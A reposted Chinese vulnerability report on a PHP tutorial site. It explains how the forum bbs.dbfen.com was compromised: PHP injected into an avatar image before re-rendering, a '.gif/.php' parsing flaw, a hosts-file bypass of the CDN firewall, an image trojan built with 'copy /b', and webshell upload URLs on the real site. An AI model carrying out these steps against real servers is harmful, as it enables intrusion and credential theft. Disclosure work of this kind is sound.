来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 因是论坛故存在上传 通过头像上传处抓包二次渲染前的加入php phpinfo();?原图 http: bbs dbfen com data attachment forum 201401 20 124804tkv7xu06npxs839v gif php通过phpinfo获取服务器真实IP 改host绕...
因是论坛故存在上传.
通过头像上传处抓包二次渲染前的加入<php phpinfo();?>原图.
http://bbs.dbfen.com/data/attachment/forum/201401/20/124804tkv7xu06npxs839v.gif/.php
通过phpinfo获取服务器真实IP.
改host绕过加速乐可上传并使用一句话.
论坛沦陷.
图片木马合成
E:\>copy 1.gif /b+ qiangda.php /b c.gif 1.gif qiangda.php
已复制 1 个文件。
传小马
http://bbs.dbfen.com/data/attachment/forum/201401/20/142927ubc80udjqrjbuoqm.gif/.php?id=cshell
小马传大马
http://bbs.dbfen.com/data/attachment/forum/201401/20/zip.php
通过论坛可查管理员密码, 主站岌岌可危.
但我都只是说说, 什么都没做. 真的. ;)
希望做云端的厂商更是一定要提高安全意识.
修复方案:
升级
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com